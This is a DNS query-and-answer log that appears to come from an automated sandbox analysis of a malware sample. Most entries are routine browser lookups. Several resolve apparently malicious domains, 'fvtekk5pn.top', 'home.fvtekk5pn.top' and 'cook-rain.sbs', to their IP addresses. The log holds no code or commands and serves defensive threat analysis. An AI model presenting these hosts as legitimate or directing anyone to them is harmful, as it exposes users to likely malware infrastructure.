                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.032401085 CET192.168.2.61.1.1.10xc59aStandard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.032587051 CET192.168.2.61.1.1.10xef32Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:30.715173960 CET192.168.2.61.1.1.10x11abStandard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:30.715379000 CET192.168.2.61.1.1.10xc643Standard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:35.568332911 CET192.168.2.61.1.1.10xd190Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:35.568499088 CET192.168.2.61.1.1.10xa0d7Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:37.443640947 CET192.168.2.61.1.1.10x3026Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:37.465886116 CET192.168.2.61.1.1.10xdf80Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:38.422589064 CET192.168.2.61.1.1.10x7794Standard query (0)fvtekk5pn.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:38.422671080 CET192.168.2.61.1.1.10x8b3cStandard query (0)fvtekk5pn.top28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.329328060 CET192.168.2.61.1.1.10xb5ccStandard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.329480886 CET192.168.2.61.1.1.10xa4daStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.350298882 CET192.168.2.61.1.1.10x2c62Standard query (0)youtube.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.350795031 CET192.168.2.61.1.1.10xe5bfStandard query (0)prod.detectportal.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.371903896 CET192.168.2.61.1.1.10xeecdStandard query (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.372500896 CET192.168.2.61.1.1.10xf47Standard query (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.224282026 CET192.168.2.61.1.1.10xb1d7Standard query (0)example.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.224971056 CET192.168.2.61.1.1.10x112aStandard query (0)ipv4only.arpaA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.227859020 CET192.168.2.61.1.1.10x439aStandard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.255887032 CET192.168.2.61.1.1.10x5f29Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.287350893 CET192.168.2.61.1.1.10xe7e3Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.288103104 CET192.168.2.61.1.1.10x889Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.309645891 CET192.168.2.61.1.1.10x51b7Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.320888042 CET192.168.2.61.1.1.10x6b07Standard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.322278023 CET192.168.2.61.1.1.10x3004Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.330569029 CET192.168.2.61.1.1.10x9467Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.339518070 CET192.168.2.61.1.1.10xd00cStandard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.016846895 CET192.168.2.61.1.1.10x32d1Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.870393991 CET192.168.2.61.1.1.10xa9e8Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.885037899 CET192.168.2.61.1.1.10x2889Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:08.885637045 CET192.168.2.61.1.1.10x4965Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.539968967 CET192.168.2.61.1.1.10xd919Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.540100098 CET192.168.2.61.1.1.10x8202Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.941123962 CET192.168.2.61.1.1.10xb145Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.941236019 CET192.168.2.61.1.1.10x3381Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.007328987 CET192.168.2.61.1.1.10x7114Standard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.783591032 CET192.168.2.61.1.1.10xf92dStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.128853083 CET192.168.2.61.1.1.10x3eb8Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.216381073 CET192.168.2.61.1.1.10xd9d1Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.321875095 CET192.168.2.61.1.1.10xfe06Standard query (0)prod.balrog.prod.cloudops.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.364348888 CET192.168.2.61.1.1.10xdd13Standard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.090451002 CET192.168.2.61.1.1.10x174aStandard query (0)prod.balrog.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.100342989 CET192.168.2.61.1.1.10xbb55Standard query (0)prod.classify-client.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.108309984 CET192.168.2.61.1.1.10x727aStandard query (0)prod.classify-client.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:00.573178053 CET192.168.2.61.1.1.10x170dStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:57:31.160274982 CET192.168.2.61.1.1.10x24c0Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:59:13.299581051 CET192.168.2.61.1.1.10x46baStandard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:32.996946096 CET192.168.2.61.1.1.10xa824Standard query (0)contile.services.mozilla.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:32.999937057 CET192.168.2.61.1.1.10x8032Standard query (0)spocs.getpocket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.000524044 CET192.168.2.61.1.1.10x1de9Standard query (0)prod.ads.prod.webservices.mozgcp.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.007788897 CET192.168.2.61.1.1.10x811Standard query (0)contile.services.mozilla.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.011997938 CET192.168.2.61.1.1.10x7613Standard query (0)prod.ads.prod.webservices.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 11:01:33.498456955 CET192.168.2.61.1.1.10x8887Standard query (0)detectportal.firefox.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      DNS Answers

                                                                                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.043514967 CET1.1.1.1192.168.2.60x6629No error (0)www.google.com142.250.184.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:23.043611050 CET1.1.1.1192.168.2.60x9c5fNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.824053049 CET1.1.1.1192.168.2.60x4867No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.824440002 CET1.1.1.1192.168.2.60x3f52No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:25.824440002 CET1.1.1.1192.168.2.60x3f52No error (0)plus.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:26.826030016 CET1.1.1.1192.168.2.60x50ceNo error (0)play.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:33.496568918 CET1.1.1.1192.168.2.60x6fd3No error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:33.496601105 CET1.1.1.1192.168.2.60xaa7bNo error (0)ntp.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.170747995 CET1.1.1.1192.168.2.60x8b92No error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.170747995 CET1.1.1.1192.168.2.60x8b92No error (0)ssl.bingadsedgeextension-prod-europe.azurewebsites.net94.245.104.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.171380043 CET1.1.1.1192.168.2.60x192dNo error (0)bingadsedgeextension-prod-europe.azurewebsites.netssl.bingadsedgeextension-prod-europe.azurewebsites.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.514089108 CET1.1.1.1192.168.2.60x127cNo error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:34.514169931 CET1.1.1.1192.168.2.60x9fe5No error (0)deff.nelreports.netdeff.nelreports.net.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.471812010 CET1.1.1.1192.168.2.60x364aNo error (0)sb.scorecardresearch.com18.245.60.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.471812010 CET1.1.1.1192.168.2.60x364aNo error (0)sb.scorecardresearch.com18.245.60.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.471812010 CET1.1.1.1192.168.2.60x364aNo error (0)sb.scorecardresearch.com18.245.60.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.471812010 CET1.1.1.1192.168.2.60x364aNo error (0)sb.scorecardresearch.com18.245.60.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.508013010 CET1.1.1.1192.168.2.60x7f8eNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.508439064 CET1.1.1.1192.168.2.60x9d71No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.508722067 CET1.1.1.1192.168.2.60x242dNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.509308100 CET1.1.1.1192.168.2.60x64d5No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.538830042 CET1.1.1.1192.168.2.60x9ff3No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:35.539017916 CET1.1.1.1192.168.2.60x724eNo error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.935899019 CET1.1.1.1192.168.2.60x4ea8No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.935899019 CET1.1.1.1192.168.2.60x4ea8No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.936275959 CET1.1.1.1192.168.2.60x8334No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.938958883 CET1.1.1.1192.168.2.60xa374No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.938958883 CET1.1.1.1192.168.2.60xa374No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.939922094 CET1.1.1.1192.168.2.60xba72No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.942553043 CET1.1.1.1192.168.2.60x8b9eNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.942553043 CET1.1.1.1192.168.2.60x8b9eNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.942925930 CET1.1.1.1192.168.2.60x47e5No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.961417913 CET1.1.1.1192.168.2.60x7519No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.961467981 CET1.1.1.1192.168.2.60x6dceNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:37.961467981 CET1.1.1.1192.168.2.60x6dceNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.957117081 CET1.1.1.1192.168.2.60x3d7cNo error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.957117081 CET1.1.1.1192.168.2.60x3d7cNo error (0)sni1gl.wpc.nucdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:38.957930088 CET1.1.1.1192.168.2.60xc844No error (0)scdn1f005.wpc.ad629.nucdn.netsni1gl.wpc.nucdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:12.488420010 CET1.1.1.1192.168.2.60xb75aNo error (0)home.fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.146085024 CET1.1.1.1192.168.2.60xb356No error (0)cook-rain.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:17.146085024 CET1.1.1.1192.168.2.60xb356No error (0)cook-rain.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.984757900 CET1.1.1.1192.168.2.60x44eaNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.985122919 CET1.1.1.1192.168.2.60x6c79No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.985122919 CET1.1.1.1192.168.2.60x6c79No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.037471056 CET1.1.1.1192.168.2.60xcd42No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.037471056 CET1.1.1.1192.168.2.60xcd42No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.037619114 CET1.1.1.1192.168.2.60xbedbNo error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.040000916 CET1.1.1.1192.168.2.60xc59aNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.040000916 CET1.1.1.1192.168.2.60xc59aNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.040755987 CET1.1.1.1192.168.2.60xef32No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.457317114 CET1.1.1.1192.168.2.60x234eNo error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.166580915 CET1.1.1.1192.168.2.60x11abNo error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:35.581059933 CET1.1.1.1192.168.2.60xd190No error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:35.581072092 CET1.1.1.1192.168.2.60xa0d7No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:37.436362982 CET1.1.1.1192.168.2.60xe4bcNo error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:37.464870930 CET1.1.1.1192.168.2.60x3026No error (0)prod.classify-client.prod.webservices.mozgcp.net35.190.72.216A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:38.887851954 CET1.1.1.1192.168.2.60x7794No error (0)fvtekk5pn.top34.116.198.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.345576048 CET1.1.1.1192.168.2.60xb5ccNo error (0)youtube.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.346054077 CET1.1.1.1192.168.2.60xa4daNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.346054077 CET1.1.1.1192.168.2.60xa4daNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.369555950 CET1.1.1.1192.168.2.60x2c62No error (0)youtube.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.370126009 CET1.1.1.1192.168.2.60xe5bfNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.388514042 CET1.1.1.1192.168.2.60xeecdNo error (0)youtube.com28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:41.392105103 CET1.1.1.1192.168.2.60xf47No error (0)prod.detectportal.prod.cloudops.mozgcp.net28IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.236458063 CET1.1.1.1192.168.2.60xb1d7No error (0)example.org93.184.215.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.237031937 CET1.1.1.1192.168.2.60x112aNo error (0)ipv4only.arpa192.0.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.237031937 CET1.1.1.1192.168.2.60x112aNo error (0)ipv4only.arpa192.0.0.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.242891073 CET1.1.1.1192.168.2.60x439aNo error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.267976046 CET1.1.1.1192.168.2.60x5f29No error (0)contile.services.mozilla.com34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.298269033 CET1.1.1.1192.168.2.60x889No error (0)spocs.getpocket.comprod.ads.prod.webservices.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.298269033 CET1.1.1.1192.168.2.60x889No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.298305035 CET1.1.1.1192.168.2.60xe7e3No error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.298305035 CET1.1.1.1192.168.2.60xe7e3No error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.320924997 CET1.1.1.1192.168.2.60xf387No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.320924997 CET1.1.1.1192.168.2.60xf387No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.329399109 CET1.1.1.1192.168.2.60x6b07No error (0)prod.ads.prod.webservices.mozgcp.net34.117.188.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:42.329574108 CET1.1.1.1192.168.2.60x3004No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.492227077 CET1.1.1.1192.168.2.60x4efbNo error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:09.492227077 CET1.1.1.1192.168.2.60x4efbNo error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.546988964 CET1.1.1.1192.168.2.60xc210No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.548032045 CET1.1.1.1192.168.2.60xd919No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.548032045 CET1.1.1.1192.168.2.60xd919No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.548032045 CET1.1.1.1192.168.2.60xd919No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.548032045 CET1.1.1.1192.168.2.60xd919No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.549479008 CET1.1.1.1192.168.2.60x8202No error (0)js.monitor.azure.comaijscdn2-bwfdfxezdubebtb0.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.549479008 CET1.1.1.1192.168.2.60x8202No error (0)aijscdn2-bwfdfxezdubebtb0.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.566709042 CET1.1.1.1192.168.2.60x682cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.566709042 CET1.1.1.1192.168.2.60x682cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.566709042 CET1.1.1.1192.168.2.60x682cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.948261976 CET1.1.1.1192.168.2.60xb145No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:22.948277950 CET1.1.1.1192.168.2.60x3381No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.793041945 CET1.1.1.1192.168.2.60xf92dNo error (0)detectportal.firefox.comdetectportal.prod.mozaws.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:32.793041945 CET1.1.1.1192.168.2.60xf92dNo error (0)prod.detectportal.prod.cloudops.mozgcp.net34.107.221.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.028028965 CET1.1.1.1192.168.2.60x2755No error (0)balrog-aus5.r53-2.services.mozilla.comprod.balrog.prod.cloudops.mozgcp.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.028028965 CET1.1.1.1192.168.2.60x2755No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:56:33.329274893 CET1.1.1.1192.168.2.60xfe06No error (0)prod.balrog.prod.cloudops.mozgcp.net35.244.181.201A (IP address)IN (0x0001)false
